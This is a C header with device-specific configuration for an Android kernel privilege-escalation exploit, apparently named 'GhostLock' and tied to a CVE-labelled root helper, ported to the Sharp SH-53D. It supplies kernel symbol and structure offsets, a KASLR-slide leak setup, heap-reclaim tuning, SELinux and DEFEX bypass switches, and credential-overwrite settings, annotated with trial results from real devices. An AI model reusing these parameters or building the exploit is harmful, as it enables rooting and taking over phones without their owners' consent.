/* SH-53D (38JP_1_30I) GhostLock target, derived from M53 port.
 * Generated by tools/compare_targets.py from V1.20A build.
 * Statuses: STATIC=verified from build, RUNTIME=resolve on
 * device, SAMSUNG=absent on MTK (dummy 0), UNUSED=dead UMH
 * path, EMPIRICAL=retune on device if unstable.
 * DO NOT use link-time absolute addresses as stock addresses. */
#ifndef SH53D_TARGET_H
#define SH53D_TARGET_H

#define BUILD_VARIANT_LABEL "sh53d-prewake-linearmap-auto-sweep"
#define DEFAULT_EXPLOIT_ATTEMPTS 1
#define DEFAULT_ATTEMPT_TIMEOUT_SEC                 180
#define PERF_CURRENT_TASK_WAITER                   1 /* SH53D RUNTIME: PMU sample of el0_svc_common x22=current */
#define PERF_CURRENT_STACK_WAITER                  1 /* SH53D RUNTIME: PMU kernel SP identifies the waiter's 16K stack */
#define PSELECT_STACK_WAITER_OFF                   0x3cd8ULL /* SH53D PANIC: invariant x25 offset in five independent crashes */
#define PSELECT_STALE_WAITER_PRIO_ORACLE 0x8bUL /* nice 19 => DEFAULT_PRIO(120)+19 */

#ifndef BUILD_FINGERPRINT
#define BUILD_FINGERPRINT "SHARP/38JP_1_30I"
#endif

#define KIMAGE_TEXT_BASE                           0xffffff8008080000ULL /* SH53D NOTE: link-time _text identical (0xffffff8008080000); runtime slide differs, resolve via tracefs leak */
#define P0_PAGE_OFFSET                             0xffffffc000000000ULL /* SH53D NOTE: 0xffffffc000000000 = PAGE_OFFSET VA39 (M53 value correct; KIMAGE-alias path uses it) */
#define P0_PHYS_OFFSET                             0x40000000ULL /* TODO(RUNTIME): DRAM base; read /proc/iomem on device */
#define P0_KERNEL_PHYS_LOAD                        0x40080000ULL /* TODO(RUNTIME): PHYS_OFFSET+TEXT_OFFSET; confirm with P0_* */
#define DATA_ADDR_USE_KIMAGE_ALIAS                 1 /* SH53D KEEP:  */
#define SKB_DATA_DELTA                             (-0xe80LL) /* SH53D EMPIRICAL: only base with repeatable reclaimed-payload mutation; paired -0xec0 trials reached waiter update but produced changed_words=0 */
#define SKB_RECLAIM_SENDS                          512 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define LEGACY_RECLAIM_SOCKETS                     4 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define LEGACY_RECLAIM_SNDBUF                      (64 << 20) /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define LEGACY_PREKILL_PREPARE_CHILDREN            1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define LEGACY_POST_TARGET_CLOSE_USEC              100000 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define LEGACY_DRAIN_ALL_PREPARE                   1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define LEGACY_DRAIN_ALL_CTX_MEMFDS                1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define APP_QUIET_RECLAIM_WINDOW                   1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define MM_STRUCT_SZ                               0x3c0ULL /* SH53D STATIC, slab object = ALIGN(904+8 cpumask,64) =960; M53 value correct, my 0x388 was struct-size confusion; M53 was 0x3c0 */
#define MM_ORDER                                   0x3ULL /* SH53D STATIC, SLUB order for 960B @minobj20 (source slub.c rules); order-0 trial failed on device; M53 was 3 */
#define CORE                                       0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define CONSUMER_CORE                              1 /* SH53D VERIFIED: core0 caused Watchdog with and without explicit yield */
#define PSELECT_SAME_CORE_YIELD_AFTER_WAKE         0 /* SH53D VERIFIED: explicit yield did not prevent core0 Watchdog */
#define FOPS_TABLE_OFF                             0x6000 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define KMALLOC_CGROUP_TYPE                        0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define KMALLOC_CACHE_TYPES                        2 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define LEGACY_RT_MUTEX_WAITER                     1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define LEGACY_CONFIGFS_RW                         1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define LEGACY_UMH_SUBPROCESS_INFO                 1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define LEGACY_USE_TCP_ROUTE                       0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define TCP_ROUTE_ATTEMPTS                         200 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define TCP_ROUTE_ARM_SEQ                          16 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define TCP_POST_GETSOCKOPT_HOLD                   20000 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define FAKE_WAITER_PRIO                           140 /* SH53D EMPIRICAL: sched nice=19 requeues it at stale prio 139 */
#define LEGACY_FOPS_WAITER_PRIO                    FAKE_WAITER_PRIO /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_FAKE_WAITER_PRIO                   0 /* SH53D DIAG: force waiter/task priority mismatch and chain walk */
#define PSELECT_STALE_TREE_SELF_TARGET_DIAG        1 /* SH53D DIAG: [7] rb_erase writes NULL to payload scratch */
#define SLIDE_FAKE_WAITER_PRIO                     0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define SLIDE_WAITER_WAKE_STATE                    0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define SLIDE_LOCK_OWNER_VALUE                     1ULL /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define SLIDE_USE_FAKE_TASK                        1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define SLIDE_TRACEFS_EVENT_ID                     0x48ULL /* SH53D STATIC, device-probe: /sys/kernel/tracing/events/sched/sched_blocked_reason/id on 38JP_1_30I; M53 was 72 */
#define SLIDE_TRACEFS_WORKER_CALLER_OFF            0x1cf6e4ULL /* SH53D STATIC, caller-observed (worker idle, 51 hits) + disasm verified: post-bl-schedule site; re-verify across reboots; M53 was 0x0005d920ULL */
#define SLIDE_ALIGNMENT                            0x200000ULL /* SH53D STATIC, observed slides 2MB-aligned (arm64 PMD granularity); M53 0x8000 too loose; M53 was 0x8000ULL */
#define SLIDE_PSELECT_WORD_SHIFT                   4 /* SH53D STATIC+EMPIRICAL: pt_regs=0x140 places waiter at result global word 19 */
#define CONSUMER_MAX_CALLS                         1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_CONSUMER_BURST_CALLS               1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_CONSUMER_SPIN_YIELDS               0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_COPYOUT_FAULT_STRETCH              1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_EX_CROSS_PAGE_FAULT                0 /* SH53D VERIFIED: cross-page user copyout did not populate dangling waiter.lock */
#define PSELECT_SYNC_COPYOUT_WCHAN                 1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_REQUIRE_FILEMAP_FAULT_WCHAN        1 /* SH53D DIAG: reject unrelated transient wchan values */
#define PSELECT_PERF_TARGET_SP_DIAG                0 /* SH53D DIAG: hardware execute breakpoint rejected with EINVAL */
#define PSELECT_COPYOUT_SYNC_TIMEOUT_USEC          1000000 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_FAULT_ALL_FDSETS                   1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_WCHAN_SCHED_BURST                  1 /* SH53D SAFE BASELINE: synchronous NULL-marker trigger */
#define PSELECT_SCHED_HELPERS                      0 /* SH53D DIAG: use one synchronous wchan-gated scheduler call */
#define PSELECT_SCHED_HELPER_CORE_BASE             2 /* SH53D DIAG: keep helpers off waiter core0 and consumer core1 */
#define PSELECT_SCHED_HELPER_CALLS                 1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_SCHED_HELPER_DELAY_NSEC            0ULL /* SH53D VERIFIED: 20/50/100us delay sweep had no stable non-NULL window */
#define PSELECT_SCHED_HELPER_AFTER_WAKE            0 /* SH53D VERIFIED: premature helper observed waiter.lock as NULL */
#define PSELECT_WCHAN_SCHED_NICE_SPREAD            0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_SCHED_BEFORE_WAKE                  0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_PREOPEN_ASHMEM                     0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_OOBINLINE                          1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_BLOCK_READ_FDSET                   0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_BLOCK_WRITE_FDSET                  0 /* SH53D DIAG: hybrid pipe corrupts overlapping fd-set pointer bits */
#define PSELECT_BLOCK_WRITE_WORD2                  0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_INERT_EXCEPT_FDSET                 0 /* SH53D DIAG: superseded by TCP three-state transition */
#define PSELECT_DIAG_WAKE_FD                       256 /* ex word4 is outside shift-4 legacy waiter; fd256 is idle until OOB */
#define PSELECT_TCP_TRANSITION_ALL                 1 /* SH53D DIAG: one saturated TCP endpoint backs all selected bits */
#define PSELECT_TCP_DRAIN_SETTLE_USEC              0 /* SH53D DIAG: replaced by observed POLLOUT wait */
#define PSELECT_TCP_WAIT_POLLOUT                   0 /* SH53D DIAG: shift-4 pointer fields are res_ex[0..2] */
#define PSELECT_TCP_OOB_LEAF_DIAG                  1 /* SH53D DIAG: OOB populates shift-4 res_ex task/lock/prio */
#define PSELECT_FAKE_WAITER_PI_PARENT_COLOR        0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_NULL_WRITE_FDSET                   0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_SLIDE_SWEEP                       0 /* SH53D VERIFIED: shift-4 w0/prio oracle; full waiter field alignment remains unproven */
#define REPAIR_FAKE_FOPS_OWNER_BEFORE_CFI          0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_ZERO_SELINUX_DIRECT                0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_PIPE_WAKE                          0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_VALIDATE_ONLY                     1 /* SH53D SAFE BASELINE: validate fdset image without a stale-waiter scheduler walk */
#define PSELECT_SCHED_DIAG                         1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define FOPS_RECLAIM_MUTATION_DIAG                 1 /* SH53D DIAG: prove the scheduler walk mutated reclaimed RB nodes */
#define PSELECT_PAIRED_LOCK_BASE_DIAG              1 /* SH53D DIAG: empty locks at raw 0x2050/0x2090 distinguish -e80/-ec0 mapping */
#define PSELECT_RECLAIM_RAW_KVA_BIAS               0x40 /* SH53D DIAG: observed lock+8 KVA appears at received raw LOCK_OFF+0x48 */
#define PSELECT_STALE_TREE_REPLACEMENT_DIAG        0 /* SH53D SAFE BASELINE: controlled NULL marker only */
#define FOPS_SELF_TARGET_DIAG                      1 /* SH53D DIAG: direct RB replacement write into reclaimed scratch */
#define FOPS_RECLAIM_OWNERLESS_DIAG                1 /* SH53D DIAG: stop safely after stale tree-node dequeue */
#define FOPS_OWNERLESS_TREE_WRITE                  0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define FOPS_TREEWRITE_NULL_ROOT                   0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define FOPS_TREEWRITE_SENTINEL_ROOT               0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define FOPS_TREEWRITE_SAFE_RBNEXT_WAITER          1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define FOPS_TREEWRITE_P0_TARGET                   0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define FOPS_LOCK_OWNER_INIT_TASK                  0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define FOPS_FAKE_TASK_PI_WAITERS                  0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define ROOT_SKIP_SELINUX_WRITE                    1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define ROOT_SKIP_DEFEX_WRITE                      1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define FOPS_RECLAIM_MUTATION_DIAG_CONTINUE_CFI    0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define ROOT_USE_DIRECT_CRED                       1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define ROOT_DIRECT_ID_PROOF                       1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define ROOT_DISABLE_UMH_FALLBACK                  1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define ROOT_USE_CONFIGFS_RW                       1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define ROOT_UMH_RELABEL_HELPER                    1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define ROOT_UMH_ABSTRACT_SOCKET                   1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define ROOT_UMH_CALLBACK_CRED_DEFAULT             1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_M53_WRITE_ONLY_CFI                 1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_CFI_ROUTE_ATTEMPTS                 1 /* SH53D DIAG: only the first nice transition can walk the stale chain */
#define PSELECT_ROUTE_DELAY_OFFSETS_USEC           -10000, -5000, 0, 5000, 10000 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_ACCEPT_PARENT_COLOR_DIRTY          1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_ABORT_ON_UNSAFE_PARTIAL            0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_REFRESH_PAGE_EACH_ROUTE            0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_CFI_IN_CONSUMER                    0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PSELECT_PRE_REPAIR_LLSEEK                  0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define LEGACY_REUSE_FOPS_PAGE_FOR_ROUTE           1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PIPE_MAX_ATTEMPTS                          1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define FOPS_MIN_OBJECT_INDEX                      1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define FOPS_MAX_OBJECT_INDEX                      33 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define FOPS_REJECT_OBJECT_INDEX                   10 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define FOPS_REJECT_OBJECT_INDEX_2                 11 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define PRE_CTX_MM_DELTA                           7 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define SLIDE_MAX_OFFSET                           0x8000000000ULL /* SH53D STATIC, slide up to ~154GB observed (VA39 full-range KASLR); mode-vote guards falses; M53 was 0x1f8000ULL */
#define SLIDE_MAX_ATTEMPTS                         32 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define KERNELSNITCH_IDENTITY_START                0xffffffc000000000ULL /* VA39 linear-map search start */
#define KERNELSNITCH_IDENTITY_END                  0xffffffff00000000ULL /* VA39 linear-map search end; leaves top 4GiB */
#define DIRECT_MAP_BASE                            0xffffffc000000000ULL /* SH53D STATIC, PAGE_OFFSET VA39; M53 was 0xffffffc000000000ULL */
#define DIRECT_MAP_END                             0xffffffff00000000ULL /* SH53D RUNTIME: task/mm/skb observed above old 64GiB bound */
#define VMEMMAP_START                              0xffffffbf00000000ULL /* SH53D STATIC, PAGE_OFFSET-VMEMMAP_SIZE (Python verified); matches M53; M53 was 0xffffffbf00000000ULL */
#define ASHMEM_MISC_FOPS_OFF                       0x1a51630ULL /* SH53D STATIC: ashmem_misc + offsetof(struct miscdevice, fops=0x10) */
#define ASHMEM_FOPS_OFF                            0x16c4780ULL /* SH53D STATIC, System.map; M53 was 0x01371a30ULL */
#define ASHMEM_IOCTL_OFF                           0x11334fcULL /* SH53D STATIC, ELF(.data) ashmem_fops+0x48; M53 was 0x00d42354ULL */
#define ASHMEM_COMPAT_IOCTL_OFF                    0x1133500ULL /* SH53D STATIC, ELF(.data) ashmem_fops+0x50; M53 was 0x00d42c94ULL */
#define ASHMEM_MMAP_OFF                            0x112767cULL /* SH53D STATIC, ELF(.data) ashmem_fops+0x58; M53 was 0x00d42ce0ULL */
#define ASHMEM_OPEN_OFF                            0x11370b8ULL /* SH53D STATIC, ELF(.data) ashmem_fops+0x68; M53 was 0x00d42e4cULL */
#define ASHMEM_RELEASE_OFF                         0x11370bcULL /* SH53D STATIC, ELF(.data) ashmem_fops+0x78; M53 was 0x00d42eccULL */
#define ASHMEM_SHOW_FDINFO_OFF                     0x1128f70ULL /* SH53D STATIC, ELF(.data) ashmem_fops+0xd8; M53 was 0x00d42fe0ULL */
#define CONFIGFS_READ_ITER_OFF                     0x11327c4ULL /* SH53D STATIC, ELF(.data) configfs_bin_file_operations+0x10; M53 was 0x002afac4ULL */
#define CONFIGFS_BIN_WRITE_ITER_OFF                0x112eeb8ULL /* SH53D STATIC, ELF(.data) configfs_bin_file_operations+0x18; M53 was 0x002affacULL */
#define COPY_SPLICE_READ_OFF                       0x3c66e8ULL /* SH53D STATIC, System.map; M53 was 0x00242984ULL */
#define NOOP_LLSEEK_OFF                            0x3835fcULL /* SH53D STATIC, System.map; M53 was 0x002022a0ULL */
#define INIT_TASK_OFF                              0x1a56f80ULL /* SH53D STATIC, System.map; M53 was 0x01bdd800ULL */
#define ROOT_TASK_GROUP_OFF                        0x1c53640ULL /* SH53D STATIC, System.map; M53 was 0x01e5ca40ULL */
#define SELINUX_ENFORCING_OFF                      0x206d3b9ULL /* SH53D STATIC, selinux_state+enforcing from System.map+DWARF; M53 was 0x019f60e8ULL */
#define DEFEX_BOOT_STATE_UNLOCKED_OFF              0 /* SH53D SAMSUNG:  */
#define DEFEX_GLOBAL_PRIVESC_STATUS_OFF            0 /* SH53D SAMSUNG:  */
#define DEFEX_GLOBAL_SAFEPLACE_STATUS_OFF          0 /* SH53D SAMSUNG:  */
#define DEFEX_GLOBAL_INTEGRITY_STATUS_OFF          0 /* SH53D SAMSUNG:  */
#define DEFEX_GLOBAL_IMMUTABLE_STATUS_OFF          0 /* SH53D SAMSUNG:  */
#define DEFEX_BOOT_STATE_UNLOCKED                  0 /* SH53D SAMSUNG:  */
#define DEFEX_GLOBAL_PRIVESC_STATUS                0 /* SH53D SAMSUNG:  */
#define DEFEX_GLOBAL_SAFEPLACE_STATUS              0 /* SH53D SAMSUNG:  */
#define DEFEX_GLOBAL_INTEGRITY_STATUS              0 /* SH53D SAMSUNG:  */
#define DEFEX_GLOBAL_IMMUTABLE_STATUS              0 /* SH53D SAMSUNG:  */
#define KMALLOC_CACHES_OFF                         0x1841b10ULL /* SH53D STATIC, System.map; M53 was 0x019e6570ULL */
#define ANON_PIPE_BUF_OPS_OFF                      0x16e60c8ULL /* SH53D STATIC, System.map; M53 was 0x01206300ULL */
#define ASHMEM_MISC_FOPS                           (KIMAGE_TEXT_BASE + ASHMEM_MISC_FOPS_OFF) /* SH53D DERIVED */
#define ASHMEM_FOPS                                (KIMAGE_TEXT_BASE + ASHMEM_FOPS_OFF) /* SH53D DERIVED */
#define ASHMEM_IOCTL                               (KIMAGE_TEXT_BASE + ASHMEM_IOCTL_OFF) /* SH53D DERIVED */
#define ASHMEM_COMPAT_IOCTL                        (KIMAGE_TEXT_BASE + ASHMEM_COMPAT_IOCTL_OFF) /* SH53D DERIVED */
#define ASHMEM_MMAP                                (KIMAGE_TEXT_BASE + ASHMEM_MMAP_OFF) /* SH53D DERIVED */
#define ASHMEM_OPEN                                (KIMAGE_TEXT_BASE + ASHMEM_OPEN_OFF) /* SH53D DERIVED */
#define ASHMEM_RELEASE                             (KIMAGE_TEXT_BASE + ASHMEM_RELEASE_OFF) /* SH53D DERIVED */
#define ASHMEM_SHOW_FDINFO                         (KIMAGE_TEXT_BASE + ASHMEM_SHOW_FDINFO_OFF) /* SH53D DERIVED */
#define CONFIGFS_READ_ITER                         (KIMAGE_TEXT_BASE + CONFIGFS_READ_ITER_OFF) /* SH53D DERIVED */
#define CONFIGFS_BIN_WRITE_ITER                    (KIMAGE_TEXT_BASE + CONFIGFS_BIN_WRITE_ITER_OFF) /* SH53D DERIVED */
#define COPY_SPLICE_READ                           (KIMAGE_TEXT_BASE + COPY_SPLICE_READ_OFF) /* SH53D DERIVED */
#define NOOP_LLSEEK                                (KIMAGE_TEXT_BASE + NOOP_LLSEEK_OFF) /* SH53D DERIVED */
#define INIT_TASK                                  (KIMAGE_TEXT_BASE + INIT_TASK_OFF) /* SH53D DERIVED */
#define ROOT_TASK_GROUP                            (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF) /* SH53D DERIVED */
#define SELINUX_ENFORCING                          (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF) /* SH53D DERIVED */
#define SELINUX_AVC                                0 /* SH53D UNUSED: AVC keeper only in generic root.c path */
#define SELINUX_STATE                              0 /* SH53D UNUSED: AVC keeper only in generic root.c path */
#define KMALLOC_CACHES                             (KIMAGE_TEXT_BASE + KMALLOC_CACHES_OFF) /* SH53D DERIVED */
#define ANON_PIPE_BUF_OPS                          (KIMAGE_TEXT_BASE + ANON_PIPE_BUF_OPS_OFF) /* SH53D DERIVED */
#define ROOT_UMH_PATH                              "/data/local/tmp/cve-2026-43499-root" /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define CALL_USERMODEHELPER_EXEC_WORK_OFF          0 /* SH53D UNUSED: static fn; UMH path not compiled into M53 route */
#define ROOT_UMH_CALLBACK_WRAPPER_OFF              0 /* SH53D UNUSED: UMH path only */
#define ROOT_UMH_CALLBACK_WAIT_OFF                 0 /* SH53D UNUSED: UMH path only */
#define SYSTEM_UNBOUND_WQ_OFF                      0x1a23030ULL /* SH53D STATIC, System.map; M53 was 0x01bcdb88ULL */
#define MODPROBE_PATH_OFF                          0x1a616ccULL /* SH53D STATIC, System.map; M53 was 0x01be91c0ULL */
#define CORE_PATTERN_OFF                           0x1a898ccULL /* SH53D STATIC, System.map; M53 was 0x01c127a8ULL */
#define CALL_USERMODEHELPER_EXEC_WORK              0 /* SH53D UNUSED: UMH path only */
#define ROOT_UMH_CALLBACK_WRAPPER                  0 /* SH53D UNUSED: UMH path only */
#define ROOT_UMH_CALLBACK_WAIT                     0 /* SH53D UNUSED: UMH path only */
#define SYSTEM_UNBOUND_WQ                          (KIMAGE_TEXT_BASE + SYSTEM_UNBOUND_WQ_OFF) /* SH53D DERIVED */
#define MODPROBE_PATH                              (KIMAGE_TEXT_BASE + MODPROBE_PATH_OFF) /* SH53D DERIVED */
#define CORE_PATTERN                               (KIMAGE_TEXT_BASE + CORE_PATTERN_OFF) /* SH53D DERIVED */
#define TASK_STRUCT_TASKS_OFF                      0x4b0ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x4b0 */
#define TASK_STRUCT_PID_OFF                        0x5b0ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x5b0 */
#define TASK_STRUCT_TGID_OFF                       0x5b4ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x5b4 */
#define TASK_STRUCT_FILES_OFF                      0x788ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x788 */
#define TASK_STRUCT_NSPROXY_OFF                    0x790ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x790 */
#define TASK_STRUCT_FS_OFF                         0x780ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x780 */
#define FS_STRUCT_ROOT_OFF                         0x18ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x18 */
#define FILES_STRUCT_FDT_OFF                       0x20ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x20 */
#define FDTABLE_FD_OFF                             0x8ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x08 */
#define TASK_STRUCT_REAL_CRED_OFF                  0x758ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x758 */
#define TASK_STRUCT_CRED_OFF                       0x760ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x760 */
#define TASK_STRUCT_CPU_CONTEXT_FP_OFF             0xb00ULL /* SH53D STATIC, thread+ctx+fp from DWARF; M53 was 0xb00 */
#define TASK_STRUCT_CPU_CONTEXT_X22_OFF            0xac8ULL /* SH53D STATIC, thread+ctx+x22 from DWARF; M53 was 0xac8 */
#define CALL_USERMODEHELPER_EXEC_ASYNC_INIT_RET    0 /* SH53D UNUSED: UMH path only */
#define KERNEL_VMALLOC_BASE                        0xffffff8000000000ULL /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define KERNEL_STACK_SIZE                          0x4000ULL /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define NSPROXY_MNT_NS_OFF                         0x18ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x18 */
#define MNT_NAMESPACE_ROOT_OFF                     0x20ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x20 */
#define MOUNT_MNT_PTR_OFF                          0x20ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x20 */
#define MOUNT_MNT_NS_OFF                           0x108ULL /* SH53D STATIC, DWARF(pahole); M53 was 0xd0 */
#define VFSMOUNT_BP_MOUNT_OFF                      0 /* SH53D UNUSED: generic root.c mount-swap only */
#define VFSMOUNT_MNT_FLAGS_OFF                     0 /* SH53D UNUSED: generic root.c mount-swap only */
#define VFSMOUNT_MNT_NOSUID                        0 /* SH53D UNUSED: generic root.c mount-swap only */
#define FILE_F_PATH_MNT_OFF                        0x10ULL /* SH53D STATIC, f_path+path.mnt from DWARF; M53 was 0x10 */
#define FILE_F_INODE_OFF                           0x20ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x20 */
#define FILE_F_COUNT_OFF                           0x38ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x38 */
#define INODE_I_SECURITY_OFF                       0x38ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x38 */
#define INODE_SECURITY_SID_OFF                     0x1c /* SH53D NOTE: verify in source fs/inode.c: inode_security struct */
#define MM_STRUCT_OWNER_OFF                        0x330ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x360 */
#define CRED_UID_OFF                               0x4ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x04 */
#define CRED_GID_OFF                               0x8ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x08 */
#define CRED_SUID_OFF                              0xcULL /* SH53D STATIC, DWARF(pahole); M53 was 0x0c */
#define CRED_SGID_OFF                              0x10ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x10 */
#define CRED_EUID_OFF                              0x14ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x14 */
#define CRED_EGID_OFF                              0x18ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x18 */
#define CRED_FSUID_OFF                             0x1cULL /* SH53D STATIC, DWARF(pahole); M53 was 0x1c */
#define CRED_FSGID_OFF                             0x20ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x20 */
#define CRED_CAP_INHERITABLE_OFF                   0x28ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x28 */
#define CRED_CAP_PERMITTED_OFF                     0x30ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x30 */
#define CRED_CAP_EFFECTIVE_OFF                     0x38ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x38 */
#define CRED_CAP_BSET_OFF                          0x40ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x40 */
#define CRED_CAP_AMBIENT_OFF                       0x48ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x48 */
#define CRED_SECURITY_OFF                          0x78ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x78 */
#define CRED_SECURITY_SID_OFF                      0x04 /* SH53D NOTE: verify in source security/selinux: task_security_struct */
#define SELINUX_INIT_SID                           64 /* SH53D KEEP:  */
#define KDP_ENABLE_OFF                             0 /* SH53D SAMSUNG:  */
#define KDP_ENABLE                                 0 /* SH53D SAMSUNG:  */
#define ROOT_UMH_SHELL_PROOF                       0 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define ROOT_UMH_WRITE_SELINUX_NO_READ             1 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define ROOT_UMH_WORK_OFF                          0x6000 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define ROOT_UMH_DATA_OFF                          0x6200 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define ROOT_UMH_CALLBACK_COMPLETION_OFF           0xb8 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define ROOT_UMH_CALLBACK_STATE_TABLE_OFF          0x180 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define SLIDE_NFULNL_LOGGER_NAME_OFF               0 /* SH53D UNUSED: slide_app path only; M53 root-umh build does not use it */
#define SLIDE_NFULNL_LOGGER_OBJECT_OFF             0 /* SH53D UNUSED: slide_app path only */
#define SLIDE_RB_PARENT_TYPE_RESTORE               1ULL /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define SLIDE_RANDOM_TABLE_BOOT_ID_DATA_PTR_OFF    0 /* SH53D UNUSED: slide_app path only */
#define SLIDE_INIT_TASK_OFF                        0x1a56f80ULL /* SH53D STATIC, System.map; M53 was INIT_TASK_OFF */
